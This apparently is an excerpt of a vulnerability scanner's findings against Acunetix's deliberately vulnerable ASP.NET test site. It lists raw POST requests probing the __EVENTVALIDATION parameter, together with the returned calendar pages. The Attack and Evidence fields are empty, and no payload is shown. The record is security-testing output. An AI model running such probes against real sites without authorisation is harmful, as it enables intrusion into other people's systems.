style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1167 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,167 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8159&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABYkFK9oIHgJTRBYBBgCAQghhLdoIZGRkfG2%2BmYEQzZaWLQoFbkKq5UUyLh0%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKDmd%2F%2FDQK645OfAwK746uPDAL7pOHDAgL7pOHDAgLcy%2FPoBQLcy%2FPoBQLcy%2BePDQLcy%2BePDQLcy5uiBgLcy5uiBgLcy4%2F5DwLcy4%2F5DwLcy6OcBwLcy6OcBwLcy9cwAtzL1zAC3MvL1wkC3MvL1wkC3Mv%2F6gIC3Mv%2F6gIC3MvT0w8C3MvT0w8C3MvH9ggC3MvH9ggCsdLRnwoCsdLRnwoCsdLFsgMCsdLFsgMCsdL5yQwCsdL5yQwCsdLt7AUCsdLt7AUCsdKBgw0CsdKBgw0CsdK1pgYCsdK1pgYCsdKp%2FQ8CsdKp%2FQ8CsdLdkQcCsdLdkQcCsdKx%2BQUCsdKx%2BQUCsdKlnA0CsdKlnA0Civm3BQKK%2BbcFAor5q9gJAor5q9gJAor53%2FwCAor53%2FwCAor585MKAor585MKAor557YDAor557YDAor5m80MAor5m80MAor5j%2BAFAor5j%2BAFAor5o4cNAor5o4cNAor5l%2BwLAor5l%2BwLAor5i4MDAor5i4MDAr%2BT98QJAr%2BT98QJAr%2BT65sBAr%2BT65sBAr%2BTn74KAr%2BTn74KAr%2BTs9UDAr%2BTs9UDAr%2BTp%2BgMAr%2BTp%2BgMAr%2BT24wEAr%2BT24wEAr%2BTz6MNAr%2BTz6MNAr%2BT48YGAr%2BT48YGAr%2BT168DAr%2BT168DAr%2BTy8IMAr%2BTy8IMApC61esPApC61esPjz39hziqR36Rn0nOEygm393uLrU%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:06:44 GMT Content-Length: 12431
Response Body - size: 12,431 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABYkFK9oIHgJTRBYBBgCAQghhLdoIZGRkfG2+mYEQzZaWLQoFbkKq5UUyLh0=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKDmd//DQK645OfAwK746uPDAL7pOHDAgL7pOHDAgLcy/PoBQLcy/PoBQLcy+ePDQLcy+ePDQLcy5uiBgLcy5uiBgLcy4/5DwLcy4/5DwLcy6OcBwLcy6OcBwLcy9cwAtzL1zAC3MvL1wkC3MvL1wkC3Mv/6gIC3Mv/6gIC3MvT0w8C3MvT0w8C3MvH9ggC3MvH9ggCsdLRnwoCsdLRnwoCsdLFsgMCsdLFsgMCsdL5yQwCsdL5yQwCsdLt7AUCsdLt7AUCsdKBgw0CsdKBgw0CsdK1pgYCsdK1pgYCsdKp/Q8CsdKp/Q8CsdLdkQcCsdLdkQcCsdKx+QUCsdKx+QUCsdKlnA0CsdKlnA0Civm3BQKK+bcFAor5q9gJAor5q9gJAor53/wCAor53/wCAor585MKAor585MKAor557YDAor557YDAor5m80MAor5m80MAor5j+AFAor5j+AFAor5o4cNAor5o4cNAor5l+wLAor5l+wLAor5i4MDAor5i4MDAr+T98QJAr+T98QJAr+T65sBAr+T65sBAr+Tn74KAr+Tn74KAr+Ts9UDAr+Ts9UDAr+Tp+gMAr+Tp+gMAr+T24wEAr+T24wEAr+Tz6MNAr+Tz6MNAr+T48YGAr+T48YGAr+T168DAr+T168DAr+Ty8IMAr+Ty8IMApC61esPApC61esPjz39hziqR36Rn0nOEygm393uLrU=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8126')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">May 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8149')" style="color:Black" title="April 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8150')" style="color:Black" title="April 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8151')" style="color:Black" title="April 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8152')" style="color:Black" title="April 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8153')" style="color:Black" title="April 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8154')" style="color:Black" title="April 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8155')" style="color:Black" title="April 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8156')" style="color:Black" title="May 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8157')" style="color:Black" title="May 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8158')" style="color:Black" title="May 03">3</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8159')" style="color:White" title="May 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8160')" style="color:Black" title="May 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8161')" style="color:Black" title="May 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8162')" style="color:Black" title="May 07">7</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8163')" style="color:Black" title="May 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8164')" style="color:Black" title="May 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8165')" style="color:Black" title="May 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8166')" style="color:Black" title="May 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8167')" style="color:Black" title="May 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8168')" style="color:Black" title="May 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8169')" style="color:Black" title="May 14">14</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8170')" style="color:Black" title="May 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8171')" style="color:Black" title="May 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8172')" style="color:Black" title="May 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8173')" style="color:Black" title="May 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8174')" style="color:Black" title="May 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8175')" style="color:Black" title="May 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8176')" style="color:Black" title="May 21">21</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8177')" style="color:Black" title="May 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8178')" style="color:Black" title="May 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8179')" style="color:Black" title="May 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8180')" style="color:Black" title="May 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8181')" style="color:Black" title="May 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8182')" style="color:Black" title="May 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8183')" style="color:Black" title="May 28">28</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8184')" style="color:Black" title="May 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8185')" style="color:Black" title="May 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8186')" style="color:Black" title="May 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8187')" style="color:Black" title="June 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8188')" style="color:Black" title="June 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8189')" style="color:Black" title="June 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8190')" style="color:Black" title="June 04">4</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1129 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,129 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8216&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOKT0WtoIHgJTRBYBBgBAznkrWtoIZGRkoKZG%2FeyrkwB08JykSWws3OY%2Fqh8%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKdsdn7CwK746uPDALtiZ78CwKo4Jb%2FDwKo4Jb%2FDwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc%2BsAwLmnc%2BsAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb%2FQBgLmnb%2FQBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk%2FAvukuT8C%2B6St0gkC%2B6St0gkC%2B6TB9gIC%2B6TB9gIC%2B6T1jQoC%2B6T1jQoC%2B6TpoAMC%2B6TpoAMC%2B6SdxwwC%2B6SdxwwC%2B6TxrAkC%2B6TxrAkC%2B6TlwwIC%2B6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz%2BQ8C3Muz%2BQ81TP4dyTM%2FWYYBvxkkPXIbDPBmgA%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:51:00 GMT Content-Length: 12462
Response Body - size: 12,462 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOKT0WtoIHgJTRBYBBgBAznkrWtoIZGRkoKZG/eyrkwB08JykSWws3OY/qh8=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKdsdn7CwK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q81TP4dyTM/WYYBvxkkPXIbDPBmgA==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:White" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for 